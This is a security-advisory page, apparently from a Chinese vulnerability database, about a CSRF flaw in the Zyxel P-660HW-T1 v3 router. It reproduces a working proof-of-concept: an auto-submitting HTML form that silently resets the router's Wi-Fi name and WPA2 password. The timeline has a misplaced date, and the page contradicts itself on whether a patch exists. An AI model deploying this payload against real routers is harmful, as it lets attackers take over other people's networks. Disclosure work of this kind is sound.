安全研究
安全漏洞
Zyxel P-660HW-T1 v3无线路由器CSRF漏洞
发布日期:2014-05-29
更新日期:2014-05-30
受影响系统:
ZyXEL P-660HW-T1 v3描述:
Zyxel P-660HW-T1是无线路由器产品。
P-660HW-T1无线路由器版本3的管理面板存在安全漏洞,攻击者可利用此漏洞在受影响设备上执行任意代码。
<*来源:Mustafa ALTINKAYNAK
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
# Date: 05/22/2014
# Author: Mustafa ALTINKAYNAK
# Vendor Homepage:http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml?t=p
# Category: Hardware/Wireless Router
# Tested on: Zyxel P-660HW-T1 v3 Wireless Router
# Patch/ Fix: Vendor has not provided any fix for this yet
---------------------------
Technical Details
---------------------------
This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
You can send the form below to prepare the target. Please offending. Being partners in crime.
Disclosure Timeline
---------------------------
05/21/2014 Contacted Vendor
05/22/2014 Vendor Replied
04/22/2014 Vulnerability Explained (No reply received)
05/23/2014 Full Disclosure
Exploit Code
---------------------------
Change Wifi (WPA2/PSK) password & SSID by CSRF
---------------------------------------------------------------------------------
<html>
<body onload="document.form.submit();">
<form action="http://192.168.1.1/Forms/WLAN_General_1"
method="POST" name="form">
<input type="hidden" name="EnableWLAN" value="on">
<input type="hidden" name="Channel_ID" value="00000005">
<input type="hidden" name="ESSID" value="WIFI NAME">
<input type="hidden" name="Security_Sel" value="00000002">
<input type="hidden" name="SecurityFlag" value="0">
<input type="hidden" name="WLANCfgPSK" value="123456">
<input type="hidden" name="WLANCfgWPATimer" value="1800">
<input type="hidden" name="QoS_Sel" value="00000000">
<input type="hidden" name="sysSubmit" value="Uygula">
</form>
</body>
</html>
-----------
Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
www.mustafaaltinkaynak.com
建议:
厂商补丁:
ZyXEL
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml?t=p
浏览次数:3400
严重程度:0(网友投票)
绿盟科技给您安全的保障